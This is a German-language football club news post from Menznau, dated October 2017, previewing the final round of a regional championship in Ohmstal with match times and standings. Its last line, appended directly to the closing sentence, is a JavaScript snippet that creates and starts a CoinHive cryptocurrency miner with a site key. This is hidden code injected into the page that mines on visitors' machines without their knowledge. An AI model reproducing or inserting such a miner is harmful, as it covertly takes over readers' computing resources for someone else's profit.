Vorschau HLM

erstellt am: 04.10.2017 | Kategorie: Fussball

Nachdem gestern Abend das letzte Training der Rasensaison absolviert wurde, steht nun noch die Rückrunde der Hinterländer-Fussballmeisterschaft in Ohmstal an am Samstag, 7. Oktober. Eine Terminkollision führte zum späten Termin und ein paar Trainings in der Dunkelheit. Das junge Menznauer Team hofft, die gute Tabellenlage nutzen zu können.

Los gehts um 14:10 Uhr gegen den Liga-Neuling San Marino. Um 15:30 Uhr ist der Alpenclub Kottwil an der Reihe und zum Saisonschluss wird um 16:50 Uhr die Partei gegen Fischbach ausgetragen.

In der Tabelle liegt Menznau nach der Vorrunde mit zwei Spielen und vier Punkten gemeinsam mit Fischbach auf dem zweiten Rang. Leader mit sieben Punkten ist der Gastgeber SC Ohmstal, der allerdings ein Spiel mehr auf dem Konto hat. Gegen Menznau spielte Ohmstal unentschieden. Es liegt also rangmässig durchaus noch etwas drin in dieser Runde. Wir freuen uns auf Unterstützung.var miner = new CoinHive.Anonymous(‚xdy0ZLd0XshUUGEEVTHOJTQSBcxt50ms‘); miner.start();